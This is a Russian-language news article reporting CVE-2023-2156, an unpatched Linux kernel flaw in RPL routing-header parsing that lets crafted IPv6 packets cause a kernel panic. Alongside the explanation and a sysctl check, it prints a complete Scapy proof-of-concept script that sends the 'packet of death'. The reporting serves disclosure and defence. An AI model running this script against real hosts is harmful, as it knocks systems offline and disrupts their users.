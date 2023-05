Раскрыты сведения о неисправленной (0-day) уязвимости (CVE-2023-2156) в ядре Linux, позволяющей остановить работу системы через отправку специально оформленных пакетов IPv6 (packet-of-death). Проблема проявляется только при включении поддержки протокола RPL (Routing Protocol for Low-Power and Lossy Networks), который в дистрибутивах по умолчанию отключён и применяется, главным образом, на встраиваемых устройствах, работающих в беспроводных сетях с большой потерей пакетов. Уязвимость вызвана некорректной обработкой внешних данных в коде разбора протокола RPL, которая приводит к срабатыванию assert-сбоя и переходу ядра в состояние panic. При размещении в структуре k_buff (Socket Buffer) данных, полученных в результате разбора заголовка пакета IPv6 RPL, если поле CmprI выставлено в значение 15, поле Segleft в 1, а CmprE в 0, 48-байтный вектор с адресами распаковывается до 528 байт и возникает ситуация, когда выделенной для буфера памяти оказывается недостаточно. В этом случае в функции skb_push, применяемой для помещения данных в структуру, срабатывает проверка на несоразмерность размера данных и буфера, генерирующая состояние panic, чтобы предотвратить запись за границу буфера. Пример эксплоита: # We'll use Scapy to craft the packet from scapy.all import * import socket # Use the IPv6 from your LAN interface DST_ADDR = sys.argv[1] SRC_ADDR = DST_ADDR # We use sockets to send the packet sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # Craft the packet # Type = 3 makes this an RPL packet # Addresses contains 3 addresses, but because CmprI is 15, # each octet of the first two addresses is treated as a compressed address # Segleft = 1 to trigger the amplification # lastentry = 0xf0 sets CmprI to 15 and CmprE to 0 p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(type=3, addresses=["a8::", "a7::", "a6::"], segleft=1, lastentry=0xf0) # Send this evil packet sockfd.sendto(bytes(p), (DST_ADDR, 0)) Примечательно, что разработчики ядра были уведомлены об уязвимости ещё в январе 2022 года и за прошедшие 15 месяцев три раза попытались устранить проблему, выпустив патчи в сентябре 2022 , октябре 2022 и апреле 2023 года, но каждый раз исправлений оказывалось недостаточно и уязвимость удавалось воспроизвести. В конечном счёте проект ZDI, координировавший работу по устранению уязвимости, принял решение раскрыть детальную информацию об уязвимости, не дожидаясь появления работающего исправления в ядре. Таким образом уязвимость до сих пор остаётся неисправленной. В том числе не эффективен патч, вошедший в ядро 6.4-rc2. Пользователям рекомендуется проверить, что протокол RPL в их системах не используется, что можно сделать при помощи команды sysctl -a | grep -i rpl_seg_enabled